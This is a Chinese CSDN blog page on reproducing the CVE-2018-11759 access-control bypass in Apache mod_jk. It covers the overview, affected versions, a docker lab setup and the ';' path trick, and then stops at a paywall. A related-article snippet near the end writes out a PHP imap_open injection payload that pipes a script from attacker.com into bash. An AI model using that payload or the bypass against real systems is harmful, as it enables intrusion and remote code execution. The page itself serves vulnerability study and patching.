【CVE-2018-11759】Apache mod_jk访问控制的绕过漏洞复现

最新推荐文章于 2024-01-17 17:11:56 发布
最新推荐文章于 2024-01-17 17:11:56 发布
阅读量4.2k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nullname0396/article/details/105729077
版权
本文介绍了Apache mod_jk Connector的CVE-2018-11759漏洞,该漏洞允许攻击者绕过访问控制限制,影响1.2.0到1.2.44版本。漏洞环境可通过docker搭建,高危级别,修复建议是升级到最新补丁。通过在jkstatus路径后添加";"字符可验证漏洞。
摘要由CSDN通过智能技术生成

0x00 漏洞概述

Apache Tomcat JK(mod_jk)Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块,用以为Apache或IIS服务器提供处理JSP/Servlet的能力。

由于httpd和Tomcat在路径处理规范上存在差异,因此可以绕过Apache mod_jk Connector 1.2.0版本到1.2.44版本上由JkMount httpd指令所定义端点的访问控制限制。
如果一个只有只读权限的jkstatus的接口可以访问的话,那么就有可能能够公开由mod_jk模块给AJP提供服务的内部路由。
如果一个具有读写权限的jkstatus接口可供访问,我们就能通过修改AJP的配置文件中相关配置来劫持或者截断所有经过mod_jk的流量,又或者进行内部的端口扫描。

0x01 影响版本

Apache mod_jk Connector 1.2.0 ~ 1.2.44

0x02 漏洞评级

高危

0x03 漏洞环境搭建

本文使用docker搭建漏洞环境。

docker环境下载地址:
https://github.com/immunIT/CVE-2018-11759

使用 git 命令把docker文件下载到本地

git clone https://github.com/immunIT/CVE-2018-11759.git

然后进入目录CVE-2018-11759

最低0.47元/天 解锁文章
Jaoing
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
概念验证 描述 特定于Apache Web服务器(httpd)的代码在将请求的路径与Apache Tomcat JKmod_jk)连接器1.2.0至1.2.44中的URI-worker映射进行匹配之前对其进行了规范化,无法正确处理某些边缘情况。如果仅通过httpd公开了Tomcat支持的URL的子集,则特殊构造的请求可能会通过反向代理公开应用程序功能,而该功能不适用于客户端通过反向代理访问应用程序。在某些配置中,特殊构造的请求也有可能绕过httpd中配置的访问控制。尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 运行后,可通过以下地址访问易受攻击的代理 开发 可以将使用mod
GitLab RCE:远程代码执行工具的教育探索
最新发布
gitblog_00015的博客
06-11 282
GitLab RCE:远程代码执行工具的教育探索 项目地址:https://gitcode.com/dotPY-hax/gitlab_RCE 项目介绍 Gitlab RCE 是一款针对旧版 GitLab(版本小于等于 11.4.7 和 12.4.0-12.8.1)的远程代码执行漏洞利用工具。该项目同样包含了对 10.4 到 12.8.1 版本的本地文件包含(LFI)漏洞的利用方法。开发者明确指出,...
CEV-2018-11759访问控制绕过原理和复现(实战)
weixin_45945976的博客
10-29 715
原理: Apache Web服务器(httpd)特定的代码在将请求的路径与Apache Tomcat JK (mod_jk)连接器1.2.0到1.2.44中的URI-工作器映射进行匹配之前对其进行了规范化,但没有正确处理某些边缘情况。如果只有Tomcat支持的网址子集通过httpd公开,那么一个特殊构造的请求就有可能通过反向代理公开应用程序的功能,而该反向代理不是为通过反向代理访问应用程序的客户端设计的。在某些配置中,特殊构造的请求也可能绕过httpd中配置的访问控制。 影响版本: Apache mod_j
Apache Mod_jk 访问控制权限绕过(CVE-2018-11759)
weixin_44047654的博客
01-09 490
Apache Mod_jk 访问控制权限绕过(CVE-2018-11759)
应用安全-软件安全-漏洞CVE整理
weixin_30872157的博客
07-01 632
HFS(文件共享) HFS远程命令执行 phpmyadmin(mysql数据库管理工具) phpmyadmin弱密码 phpmoadmin(mongoDB管理工具 ) phpmoadmin远程代码执行Elasticsearch(搜索服务器) elasticsearch远程命令执行 Elasticsearch未授权访问漏洞 Elasticsearch任意文件读取 "受...
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
**CVE-2018-8120详解:Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞,它属于本地权限提升(Local Security Authority Subsystem Service, LSA)漏洞类型。这个漏洞主要影响Windows...
CVE-2018-3252:CVE-2018-3252-PoC
03-18
CVE-2018-3252-PoC 1.使用YSOSERIAL生成PoC 2.您应该知道目标weblogic服务器的USERNAME和PASSWORD 3.将有效载荷发送到URL POST /bea_wls_deployment_internal/DeploymentService ...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念,首先,CVE(Common Vulnerabilities and Exposures)是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是...
Apache Mod_jk访问控制权限绕过(CVE-2018-11759)
m0_65150886的博客
01-17 404
如果一个具有读写权限的jkstatus接口可供访问,我们就能通过修改AJP的配置文件中相关配置来劫持或者截断所有经过mod_jk的流量,又或者进行内部的端口扫描。Apache Tomcat JKmod_jk)Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块,用以为Apache或IIS服务器提供处理JSP/Servlet的能力。,在地址后添加特殊符号“;2.访问 http://ip:port/jkstatus显示无权访问。
DVR登录绕过漏洞复现(CVE-2018-9995)
LKmnbZ's Blog
01-12 1239
1. 基本概念 POC proof ofConcept 观点证明 证明漏洞是存在的 一般对目标没有伤害的 EXP exploit 漏洞利用 具备了对目标造成伤害的能力 一般以获取远端的控制权为主要标志 VUL vulnerability 泛指漏洞 CVE Common Vulnerabilities & Exposures 公共漏洞和暴露 0DAY Zero-daye...
针对校园某服务器的一次渗透测试
zhangge3663的博客
01-31 2521
发现学校其中一台服务器可能(绝对)存在漏洞。我想(绝对)能拿下它; 而且渗透测试的过程很有趣,便将其记录下来。 0x00 前期交互及信息收集 由于是对内网直接进行大扫描,所以直接判断这不仅是一个Web服务器(多个),同时还运行着FTP、数据库。 在此,再次使用nmap扫描一次,结果如下: $ sudo nmap -T4 -n -sS -sV -O 192.168.3.72Nmap scan report for 192.168.3.72Host is up (0.00076s late..
Tomcat漏洞修复方法【补丁下载及安装详细流程】
m0_67402235的博客
08-26 5010
目录访问tomcat的官网漏洞补丁网址会看到各个版本的tomcat的漏洞修复记录及方法例如 搜索CVE-2016-6797漏洞的补丁点击revision后的序列号 进入补丁修复界面,进来之后,可以看到详细的漏洞修复方法,及补丁http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.16...
apache 限制IP访问
程序员写的技术 FAQ 和杂文
04-16 4302
Options All AllowOverride None Order Deny,Allow Deny From all Allow From 192.168.0.0/24 Allow From 127.0.0.1 Allow From 59.37.x.x/28 上面这一段的意思是对/var/www目录下面的文件,只允许从192.168.0/24 和 127.0.1、5
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
HWHXY的博客
09-13 323
插件开发学习第8套。继续上一章的分析。
漏洞预警:Tomcat爆出安全绕过漏洞CVE-2018-1305 789多版本受影响
GTOFEI013的博客
05-15 4718
Apache Tomcat爆出安全绕过漏洞CVE编号CVE-2018-1305,Apache Tomcat 7、8、9多个版本受到影响。攻击者可以利用这个问题,绕过某些安全限制来执行未经授权的操作,这可能有助于进一步攻击。漏洞概述         在 Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 an...
Apache Tomcat安全绕过漏洞CVE-2018-1305)
weixin_30607029的博客
04-23 1452
https://www.freebuf.com/column/163927.html 转载于:https://www.cnblogs.com/diyunpeng/p/10757101.html
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值